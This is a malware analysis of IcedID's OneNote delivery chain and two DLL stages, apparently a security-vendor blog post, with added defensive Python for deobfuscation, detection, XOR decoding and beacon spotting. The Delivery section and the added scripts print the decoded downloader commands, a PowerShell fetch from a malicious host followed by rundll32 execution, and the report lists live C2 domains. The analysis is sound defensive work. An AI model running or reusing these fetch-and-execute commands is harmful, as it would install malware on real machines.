IcedID (BokBot): From banking trojan to backdoor

Summary

  • First discovered in 2017
  • Has evolved from a banking trojan into a backdoor
  • Delivered through malicious email attachments: a OneNote document carrying embedded scripts that download a DLL
  • Has two stages, both Win64 DLLs written in C/C++
  • Executed from the command line via rundll32.exe

Introduction

IcedID, also known as BokBot, was a banking trojan when it was discovered in 2017. Today it is mostly used as an initial access broker for other malware. It typically infects victims' machines through malicious email attachments. It has used various attachment types, such as archives and Word and Excel files, but the latest attacks used OneNote files.

Technical details

Delivery

As OneNote files don't support macros, IcedID relies on embedded files instead. Upon opening the document, the victim sees the following text and a button:

[Screenshot: lure text and button]

Dragging the button aside reveals several attachments hidden behind it. These attachments can be HTA or CMD files.

[Screenshot: attachments hidden behind the button]

When the button is pressed, OneNote warns that the attachment could harm the computer.

[Screenshot: OneNote warning dialog]

Here is an example of an HTA file used to download and execute IcedID. It connects to the embedded URL, downloads two files and saves them to disk, then executes both.

[Screenshot: HTA downloader script]

Besides HTA files, CMD files can be attached. Here is an example of such a script. It is obfuscated: specific substrings of the command text are swapped for other symbols, and the script substitutes them back before running.

[Screenshot: obfuscated CMD script]

This decodes to the following two commands:

powershell invoke-webrequest -uri http://mrassociattes.com/images/62.gif -outfile c:\programdata\COIm.jpg

rundll32 c:\programdata\COIm.jpg,init

Note the extension trick: the payload is fetched as a .gif, written to disk under a .jpg name, and loaded by rundll32 anyway, since the loader does not care about the file extension.
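To show how such a script can be unpacked without running it, here is an added example (written for this edit, not from the Acronis report or from the attachment itself). It assumes the attachment uses cmd's %VAR:old=new% substitution to swap placeholder symbols back into the real text, which is the usual form of the technique described above; the stand-in script, its variable names and its placeholder symbols are constructed, and the decoder also handles %VAR:~start,len% substring expansion as a generalization.

```python
"""Added example (not from the Acronis report): expand cmd.exe-style
variable substitutions to recover the commands hidden in an obfuscated
.cmd attachment.

Assumption: the attachment stores the command text with certain substrings
swapped for placeholder symbols and restores them with cmd's
%VAR:old=new% syntax (the report describes the technique but not the exact
script). The script below is a constructed stand-in, not the real sample;
the variable names and placeholder symbols are invented. %VAR:~start,len%
substring expansion, a related batch obfuscation trick, is also handled."""
import re
from typing import Dict, List

# Constructed sample: 'e' was replaced by '@' and '-' by '#' in the stored
# text; the two expansions at the bottom swap them back before execution.
SAMPLE_CMD = r"""@echo off
set "a=pow@rsh@ll invok@#w@br@qu@st #uri http://mrassociatt@s.com/imag@s/62.gif #outfil@ c:\programdata\COIm.jpg"
set "b=rundll32 c:\programdata\COIm.jpg,init"
set "c=%a:@=e%"
%c:#=-%
%b%
"""

SET_RE = re.compile(r'^\s*set\s+"?([^=\s"]+)=(.*?)"?\s*$', re.IGNORECASE)
# %NAME%, %NAME:~start[,len]% or %NAME:old=new%
EXPAND_RE = re.compile(
    r"%([A-Za-z_][A-Za-z0-9_]*)(?::~(-?\d+)(?:,(-?\d+))?|:([^=%]+)=([^%]*))?%"
)


def expand(line: str, env: Dict[str, str]) -> str:
    """Expand %VAR...% references in one line using cmd's batch-file semantics."""

    def sub(m: re.Match) -> str:
        value = env.get(m.group(1).lower())
        if value is None:
            return ""  # in a batch file an undefined variable expands to nothing
        if m.group(2) is not None:  # %VAR:~start,len%  (Python slicing matches cmd)
            value = value[int(m.group(2)):]
            if m.group(3) is not None:
                value = value[:int(m.group(3))]
        elif m.group(4) is not None:  # %VAR:old=new%, replacement is case-insensitive
            value = re.sub(re.escape(m.group(4)), lambda _: m.group(5), value,
                           flags=re.IGNORECASE)
        return value

    return EXPAND_RE.sub(sub, line)


def deobfuscate(script: str) -> List[str]:
    """Walk the script like cmd would: track SET, expand references.

    Returns the commands that would actually execute, obfuscation undone."""
    env: Dict[str, str] = {}
    commands: List[str] = []
    for raw in script.splitlines():
        line = raw.strip().lstrip("@")
        low = line.lower()
        if not line or low.startswith(("echo off", "rem ", "::")):
            continue
        m = SET_RE.match(line)
        if m:
            env[m.group(1).lower()] = expand(m.group(2), env)
            continue
        commands.append(expand(line, env))
    return commands


if __name__ == "__main__":
    for cmd in deobfuscate(SAMPLE_CMD):
        print(cmd)
```

Run against the real attachment, the output is the same two commands shown above; anything the script builds with delayed expansion (!VAR!) or via call would need the expander extended, so treat an empty or partial result as "look by hand", not "clean".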

Execution

First stage

Although the downloaded file carries an image extension (.png in this case), it is actually a Win64 DLL written in C/C++.

[Screenshot: PE header of the first-stage DLL]

If the OneNote file contains an HTA, it also downloads a PDF and opens it automatically. This file is not itself malicious; it is a decoy with banking-related content meant to make the lure look legitimate.

[Screenshot: decoy PDF]

During execution, the first stage decrypts a code region in memory that is only visible while debugging. Although this sample has many imported functions, some of them are obfuscated and resolved only at run time:

[Screenshot: run-time import resolution]

IcedID loads the address of the decrypted region into a register and calls it.

[Screenshot: indirect call into the decrypted region]

Here it resolves more imports and libraries, but in a different way. It takes stored data (shown as hex in the disassembly) and decodes it with an XOR operation. This approach is used throughout the code, and the key differs for each piece of data that is decoded.

[Screenshot: XOR decoding loop]

The results are the names of libraries that will be used later.

[Screenshot: decoded library names]

IcedID then creates a thread that does the main work.

[Screenshot: CreateThread]

It loads the URL of the remote server:

[Screenshot: C2 URL]

Then it gathers information about the network adapters:

[Screenshot: GetAdaptersInfo]

IcedID also collects information about the user and PC, using these functions (plus the CPUID instruction):

NetWkstaGetInfo
GetComputerNameW
GetUserNameW
LookupAccountName
ConvertSidToStringSidA
cpuid (CPU instruction, not an API call)
RtlGetVersion
GetProductInfo
GetNativeSystemInfo
NetGetJoinInformation

Together these yield the workstation and domain-join state, the computer and user names, the user's SID, CPU details and the OS version, edition and architecture: a host fingerprint.

Then it connects to the server:

[Screenshot: connection to the C2 server]

IcedID sends a packet that includes the collected information. This is probably used to decide which version of the malware is appropriate for the victim's system.

[Screenshot: check-in packet]

It then receives a long stream of 1460-byte TCP segments (the typical Ethernet MSS), i.e. a file download.

[Screenshot: download traffic]

Two files are downloaded: the first is a DLL, the second a DAT file. IcedID also copies the DLL to the %TEMP% folder under a .dat name.

[Screenshot: dropped files]

Second stage

The downloaded second stage is also a Win64 DLL written in C/C++.

[Screenshot: PE header of the second-stage DLL]

It is executed from the command line with the following arguments:

rundll32.exe "C:\Users\Flare\AppData\Roaming\Onuy\honuom64.dll",#1 --ha="AbleIvory\license.dat"

The argument '#1' tells rundll32 to call the export with ordinal 1 in the DLL; in this case that is the 'init' function. Its implementation differs from the first stage, but the functionality is similar: it decrypts and loads an additional module named Init.dll. As in the first stage, this happens in a memory region that is only visible while debugging.

[Screenshot: Init.dll decrypted in memory]
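The two command lines on this page (rundll32 loading an image-named file from ProgramData, and rundll32 calling export #1 with a --ha= argument) are exactly what a process-creation rule should catch. The following is an added example, not from the Acronis report, that triages constructed process-creation events for those patterns; the event field names, the benign control events and the list of "disguise" extensions are assumptions, not a specific product's schema.

```python
"""Added example (not from the Acronis report): triage process-creation
events for the execution pattern described in this analysis.

Flags: an Office/OneNote parent spawning a script host; PowerShell
downloading to a file with a non-executable extension; rundll32 loading a
module that is not a .dll, lives in a user-writable directory, or is
called by ordinal (#N); and the campaign-specific "--ha=" argument.
The events below are constructed to mirror the command lines in the
report plus two benign controls; field names follow common EDR schemas
but are an assumption, not a specific product's format."""
import ntpath
from typing import Dict, List

OFFICE_PARENTS = {"onenote.exe", "winword.exe", "excel.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
DOWNLOAD_CMDLETS = {"invoke-webrequest", "iwr", "start-bitstransfer", "curl", "wget"}
DISGUISE_EXT = {".jpg", ".jpeg", ".png", ".gif", ".bmp", ".dat", ".txt", ".tmp"}
USER_WRITABLE = ("\\programdata\\", "\\appdata\\", "\\users\\public\\", "\\temp\\")


def split_cmdline(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace outside double quotes."""
    tokens, cur, in_quote = [], "", False
    for ch in cmdline:
        if ch == '"':
            in_quote = not in_quote
            cur += ch
        elif ch.isspace() and not in_quote:
            if cur:
                tokens.append(cur)
                cur = ""
        else:
            cur += ch
    if cur:
        tokens.append(cur)
    return tokens


def rundll32_findings(tokens: List[str]) -> List[str]:
    """rundll32 syntax is: rundll32 <module>,<export> [args]."""
    if len(tokens) < 2:
        return []
    module, sep, export = tokens[1].rpartition(",")
    if not sep:  # no export given
        module, export = export, ""
    module = module.strip('"')
    ext = ntpath.splitext(module)[1].lower()
    findings = []
    if ext != ".dll":
        findings.append(f"rundll32 module with non-DLL extension {ext}")
    if any(d in module.lower() for d in USER_WRITABLE):
        findings.append("rundll32 module in user-writable directory")
    if export.startswith("#"):
        findings.append(f"export called by ordinal {export}")
    if any(t.lower().startswith("--ha=") for t in tokens[2:]):
        findings.append("IcedID-style --ha= argument")
    return findings


def powershell_findings(tokens: List[str]) -> List[str]:
    """Download cmdlet, and -OutFile pointing at a disguised extension."""
    low = [t.strip('"').lower() for t in tokens]
    findings = []
    if any(t in DOWNLOAD_CMDLETS for t in low):
        findings.append("PowerShell download cmdlet")
        for i, t in enumerate(low[:-1]):
            ext = ntpath.splitext(low[i + 1])[1]
            if t == "-outfile" and ext in DISGUISE_EXT:
                findings.append(f"download saved with disguised extension {ext}")
    return findings


def triage(events: List[Dict[str, str]]) -> List[List[str]]:
    """Return one findings list per event (empty list = nothing suspicious)."""
    results = []
    for ev in events:
        parent = ntpath.basename(ev["parent"]).lower()
        image = ntpath.basename(ev["image"]).lower()
        tokens = split_cmdline(ev["cmdline"])
        findings = []
        if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
            findings.append(f"{parent} spawned script host {image}")
        if image == "rundll32.exe":
            findings += rundll32_findings(tokens)
        elif image in ("powershell.exe", "pwsh.exe"):
            findings += powershell_findings(tokens)
        results.append(findings)
    return results


# Constructed events: the chain from the report, then two benign controls.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Users\Flare\AppData\Local\Temp\attach.hta"'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell invoke-webrequest -uri http://mrassociattes.com/images/62.gif -outfile c:\programdata\COIm.jpg"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32 c:\programdata\COIm.jpg,init"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'rundll32.exe "C:\Users\Flare\AppData\Roaming\Onuy\honuom64.dll",#1 --ha="AbleIvory\license.dat"'},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -Command Get-Date"},
]

if __name__ == "__main__":
    for ev, findings in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(ev["cmdline"][:60], "->", findings or "clean")
```

The ordinal and user-writable-directory checks are the durable part; the --ha= string is campaign-specific and will rot, so keep it as a separate, low-weight indicator rather than the rule's core.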

It creates a new thread and suspends the main one:

[Screenshot: thread creation]

Next, IcedID resolves additional imports. It takes stored data (in hex) and decrypts it with an XOR operation, as in the first stage.

[Screenshot: XOR decoding]

The result is a set of library names:

[Screenshot: decoded library names]

IcedID decrypts more data in the same way. The result is file names and URLs, but the malware did not connect to these during execution.

[Screenshot: decoded file names and URLs]

One more decoded block of data contains the following imported libraries and functions, grouped here by module:

ADVAPI32.dll: RegCloseKey, RegOpenKeyExA, RegQueryValueExA, CryptAcquireContextW, CryptReleaseContext, CryptGetHashParam, CryptCreateHash, CryptHashData, CryptDestroyHash, GetUserNameA, GetUserNameW, OpenProcessToken, GetSidIdentifierAuthority, GetSidSubAuthority, GetSidSubAuthorityCount, GetTokenInformation, LookupAccountNameW, ConvertSidToStringSidA, RegCreateKeyA, RegDeleteKeyA, RegOpenKeyA, RegSetValueExA, RegDeleteValueA, RegEnumValueA, AdjustTokenPrivileges, LookupPrivilegeValueA, CryptDestroyKey, CryptImportKey, InitiateSystemShutdownExA, CryptVerifySignatureA, RegCreateKeyExA, RegEnumKeyExA, RegQueryValueExW, CredEnumerateW, CredFree, CryptAcquireContextA
SHLWAPI.dll: StrChrA, StrChrW, StrCmpIW, SHSetValueA, StrStrA, StrStrIA, StrCmpNIA, StrToIntExA, StrToIntA, StrCmpNI, StrStrIW
WS2_32.dll: WSACreateEvent, WSAEnumNetworkEvents, WSAEventSelect
IPHLPAPI.DLL: GetAdaptersInfo
NETAPI32.dll: NetApiBufferFree, NetGetJoinInformation, NetWkstaGetInfo
OLEAUT32.dll: (no functions listed)
msvcrt.dll: memset, vsnprintf, memcpy
SHELL32.dll: SHGetFolderPathA, SHGetFolderPathW, ShellExecuteExA
USER32.dll: wsprintfA, wsprintfW
Secur32.dll: InitSecurityInterfaceA
WINHTTP.dll: WinHttpCloseHandle, WinHttpQueryOption, WinHttpSetStatusCallback, WinHttpCrackUrl, WinHttpOpen, WinHttpConnect, WinHttpReadData, WinHttpQueryDataAvailable, WinHttpSetOption, WinHttpOpenRequest, WinHttpSendRequest, WinHttpReceiveResponse, WinHttpQueryHeaders
CRYPT32.dll: CertFreeCertificateContext, CryptUnprotectData
RPCRT4.dll: UuidFromStringA, UuidFromString
ole32.dll: CoCreateInstance, CoInitialize, CoInitializeEx, CoTaskMemFree
ntdll.dll: RtlGetVersion, ZwQuerySystemInformation, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtProtectVirtualMemory, RtlDecompressBuffer
KERNEL32.dll: Sleep, CloseHandle, GetLastError, HeapAlloc, HeapFree, GetProcessHeap, CreateMutexA, ExitProcess, GetProductInfo, lstrcpyA, GetCurrentProcessId, GetLocalTime, lstrlenA, CreateDirectoryA, CreateDirectoryW, GetTempPathA, lstrcatA, lstrcatW, lstrlenW, QueryPerformanceCounter, QueryPerformanceFrequency, SwitchToThread, GetTickCount, GetComputerNameExW, GetNativeSystemInfo, LocalFree, ReadFile, WriteFile, CreatePipe, PeekNamedPipe, HeapReAlloc, WaitForSingleObject, TerminateProcess, CreateProcessA, WideCharToMultiByte, GetTickCount64, DeleteFileA, lstrcmpiA, CopyFileA, SetEvent, CreateEventA, OpenEventA, CreateThread, TerminateThread, CreateFileA, CreateEventW, SleepEx, QueueUserAPC, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, MultiByteToWideChar, ExpandEnvironmentStringsA, CreateFileW, FindClose, FindFirstFileA, FindNextFileA, GetFileSize, CreateRemoteThread, RegisterWaitForSingleObject, UnregisterWait, ResumeThread, GetSystemDirectoryA, GetWindowsDirectoryA, WaitForMultipleObjects, GetModuleHandleA, GetProcAddress, SetErrorMode, SetFilePointer, LocalAlloc, LoadLibraryA, FreeLibrary

These imports show that the malware is not limited to networking. It also has what it needs to work with the file system, the registry and other processes: CreateRemoteThread, NtWriteVirtualMemory, NtProtectVirtualMemory and QueueUserAPC are the building blocks of code injection, while CredEnumerateW and CryptUnprotectData point to credential access. These are the capabilities it would use to install further malware.

IcedID then reads its command line and extracts the argument "AbleIvory\license.dat".

It reads this file and decrypts it with an XOR operation:

[Screenshot: license.dat decryption]

The decoded license.dat is not a PE file, but it contains strings used for stealing credentials from browsers' password vaults.

[Screenshot: decoded license.dat strings]
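Both XOR stages described on this page, the per-key library names in the first stage and the license.dat file here, can be recovered offline with a little Python. The following is an added example, not code from the Acronis analysis or from the malware: the key sizes, keys, plaintexts and the "Login Data" crib are constructed assumptions, chosen to illustrate single-byte key brute forcing for the string blobs and a known-plaintext attack on a repeating key for the file.

```python
"""Added example (not from the Acronis report): recover XOR-obfuscated data
of the two kinds the analysis describes.

(1) Library/import names, each encoded with its own single-byte key: the
key is recovered by trying all 256 values and accepting the one that
yields printable text ending in ".dll".
(2) A file such as license.dat XORed with a repeating key of unknown
length: the key is recovered from a known-plaintext crib.

Key sizes, keys and plaintexts below are constructed for illustration;
the report does not state the real samples' key layout, and "Login Data"
as a crib is an assumption (it is the Chrome credential store name)."""
from itertools import cycle
from typing import List, Optional


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key; XOR is symmetric, so this also decodes."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_single_byte_key(blob: bytes) -> Optional[int]:
    """Brute-force the key of a single-byte XOR'd, NUL-terminated library name."""
    for key in range(256):
        text = xor_bytes(blob, bytes([key])).rstrip(b"\x00")
        if text.lower().endswith(b".dll") and all(0x20 <= c < 0x7F for c in text):
            return key
    return None


def decode_import_names(blobs: List[bytes]) -> List[str]:
    """Decode a list of library names, each encoded under its own key."""
    names = []
    for blob in blobs:
        key = recover_single_byte_key(blob)
        if key is not None:
            names.append(xor_bytes(blob, bytes([key])).rstrip(b"\x00").decode("ascii"))
    return names


def recover_repeating_key(cipher: bytes, crib: bytes, max_key_len: int = 8) -> Optional[bytes]:
    """Known-plaintext attack on repeating-key XOR.

    Slides the crib over every offset, derives the keystream fragment
    cipher ^ crib, and looks for a period <= max_key_len the fragment is
    consistent with. A candidate is accepted only if the full decryption
    is printable text (NULs allowed as string terminators)."""
    for off in range(len(cipher) - len(crib) + 1):
        frag = xor_bytes(cipher[off:off + len(crib)], crib)
        for period in range(1, min(max_key_len, len(crib) - 1) + 1):
            if not all(frag[t] == frag[t + period] for t in range(len(frag) - period)):
                continue
            # frag[t] == key[(off + t) % period]; rotate it back to key[0..period)
            key = bytes(frag[(j - off) % period] for j in range(period))
            plain = xor_bytes(cipher, key)
            if all(c == 0 or 0x20 <= c < 0x7F for c in plain):
                return key
    return None


# Constructed samples (not real IcedID data).
IMPORT_KEYS = [0x3C, 0x91, 0xE7]
IMPORT_NAMES = [b"kernel32.dll", b"advapi32.dll", b"winhttp.dll"]
SAMPLE_BLOBS = [xor_bytes(n + b"\x00", bytes([k])) for n, k in zip(IMPORT_NAMES, IMPORT_KEYS)]

SAMPLE_DAT_KEY = b"\x5a\x13\x7e\x21"
SAMPLE_DAT_PLAIN = b"chrome\x00Login Data\x00Web Data\x00logins.json\x00"
SAMPLE_DAT = xor_bytes(SAMPLE_DAT_PLAIN, SAMPLE_DAT_KEY)

if __name__ == "__main__":
    print(decode_import_names(SAMPLE_BLOBS))
    key = recover_repeating_key(SAMPLE_DAT, b"Login Data")
    print(key, xor_bytes(SAMPLE_DAT, key) if key else None)
```

For a real sample the key is usually sitting next to the blob in the binary, so pulling it from the decode loop in the debugger is faster than either attack; the brute-force and crib methods are for the case where you only have the encoded data, for example a dropped .dat file with no accompanying code.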

Next, IcedID prepares the information that will be sent to the server. It runs the data through CryptHashData(). A hash is one-way, so what reaches the server is a digest of the collected values rather than the values themselves; no CryptEncrypt appears among the imports, so this is hashing, not encryption.

[Screenshot: CryptHashData call]

Examples of the data that is hashed before being sent to the server:

[Screenshot: data prior to hashing]
[Screenshot: data prior to hashing, continued]

IcedID connects to the saved server address:

[Screenshot: connection to the C2 address]

The sample analyzed connected to these servers:

palasedelareforma.com
renomesolar.com
sinkhole.sh

IcedID prepares a request and sends it with WinHttpSendRequest:

[Screenshot: WinHttpSendRequest]

It then contacts the server every five minutes. During the analysis, the sample did nothing further; we suspect it is waiting for a specific command from the server before starting its primary activity, such as downloading, installing and running additional malware. A fixed five-minute beacon is itself a useful detection signal: regularly spaced connections to the same host stand out from interactive browsing.

[Screenshot: periodic beacon traffic]
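The following is an added example (not from the Acronis report) of how a fixed check-in interval like the one above can be found in connection logs: for each destination it measures the gaps between successive connections and flags destinations whose gaps barely vary. The flow records, including the 300-second beacon with a few seconds of jitter and the irregular browsing traffic, are constructed.

```python
"""Added example (not from the Acronis report): spot a fixed-interval
check-in in connection logs.

Per destination, the inter-connection gaps are computed; a destination
whose gaps are tightly clustered (low coefficient of variation) over
enough connections is reported as a beacon. The flow records below are
constructed: a ~300-second beacon with small jitter to one host and
irregular browsing to another. Real traffic needs larger windows and
tolerance for sleep-skipping, which this minimal version does not add."""
import statistics
from collections import defaultdict
from typing import Dict, List, Tuple

BASE = 1_700_000_000  # arbitrary epoch start for the constructed sample

# (timestamp, destination). Beacon every 300 s with +/- 3 s jitter.
BEACON_JITTER = [0, 2, -1, 3, -2, 1, 0, -3]
BROWSING_GAPS = [5, 40, 2, 600, 12, 90, 1]

SAMPLE_FLOWS: List[Tuple[int, str]] = [
    (BASE + 300 * i + j, "palasedelareforma.com") for i, j in enumerate(BEACON_JITTER)
]
_t = BASE + 17
for _g in [0] + BROWSING_GAPS:
    _t += _g
    SAMPLE_FLOWS.append((_t, "example.com"))


def interval_stats(flows: List[Tuple[int, str]], min_count: int = 6) -> Dict[str, Dict[str, float]]:
    """Median gap and coefficient of variation per destination with enough flows."""
    by_dst: Dict[str, List[int]] = defaultdict(list)
    for ts, dst in flows:
        by_dst[dst].append(ts)
    stats: Dict[str, Dict[str, float]] = {}
    for dst, times in by_dst.items():
        if len(times) < min_count:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        stats[dst] = {
            "count": len(times),
            "median_gap": statistics.median(gaps),
            "cv": statistics.stdev(gaps) / mean,  # relative spread of the gaps
        }
    return stats


def find_beacons(flows: List[Tuple[int, str]], min_count: int = 6,
                 max_cv: float = 0.05) -> Dict[str, Dict[str, float]]:
    """Destinations whose connection gaps vary by at most max_cv of the mean."""
    return {d: s for d, s in interval_stats(flows, min_count).items() if s["cv"] <= max_cv}


if __name__ == "__main__":
    for dst, s in find_beacons(SAMPLE_FLOWS).items():
        print(f"{dst}: {s['count']} connections, median gap {s['median_gap']} s, cv {s['cv']:.3f}")
```

Tune min_count and max_cv to the environment: a single threshold over a short window misses beacons that randomize their sleep, and it will flag legitimate periodic services (update checks, NTP, monitoring agents), which should be allow-listed rather than used as an excuse to raise the threshold.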

Network traffic

The first server, ituitem.net, resolves to 5.61.47.8; the second stage was downloaded from there. The address is registered in Germany.

[Screenshot: WHOIS for 5.61.47.8]

The next IP address, 37.252.6.77, belongs to the malicious domain palasedelareforma.com and is registered in Poland.

[Screenshot: WHOIS for 37.252.6.77]

The server renomesolar.com actually has two IP addresses, but this sample connects only to 38.180.0.89, registered in France. The second address is used by other IcedID samples.

[Screenshot: resolutions for renomesolar.com]

Although sinkhole.sh itself is not malicious, passive DNS shows many domains from other IcedID campaigns resolving to its IP address 80.78.24.30, consistent with those domains having been sinkholed. Some of those servers have already been taken offline.

[Screenshot: passive DNS for 80.78.24.30]

Obfuscation

IcedID uses several obfuscation techniques. The main functionality is decrypted and loaded only at run time, so it can be seen only under a debugger. It hides its full import list: the names are stored XOR-encoded, decoded on demand and resolved into memory. And it frequently loads a function's address into a general-purpose register and calls through it, which hides the target from static call-graph analysis.

Conclusion

IcedID has successfully evolved from a banking trojan into a backdoor, and now operates as an initial access broker for other malware. That makes it potentially more dangerous, depending on what it delivers. There are now many different samples communicating with different servers, and their number is still growing.

IcedID uses malicious email attachments to gain access to victims' systems, so users must be particularly careful when opening such messages.

During our analysis, the IcedID sample did not download any third-party malware (perhaps because it was awaiting a particular command from the server). With good security tools it can be spotted and stopped at the initial stage.

Detected by Acronis

Acronis Cyber Protect detects and blocks the malicious CMD and HTA files attached to OneNote files, as well as both the first-stage downloader and the second-stage backdoor.

[Screenshot: detection in Acronis Cyber Protect]

IoCs

Files

SHA256                                                             Description
681217e6c8ed3ed37c1312646afb8e0cfe25e6840f461d10a7d9cdd4ffa725cb   CMD attachment example
03fdf03c8f0a0768940c793496346253b7ccfb7f92028d3281b6fc75c4f1558e   HTA attachment example
8d076fe2d93a9ebd5701eb7a1acab37e9d390df7f50e6d155c6c7289934d2b54   First-stage downloader
dfff2ddb7d6a6881ca003ef65347e1087ba8bac32b0a62cec1174486f1f958e1   Second-stage backdoor
f2ab26557364d548a40ab3c43db78e03750e8eb391258080dda31b5c3f71c1d9   license.dat

Network indicators

Domain                   IP address
ituitem.net              5.61.47.8
palasedelareforma.com    37.252.6.77
renomesolar.com          38.180.0.89
sinkhole.sh              80.78.24.30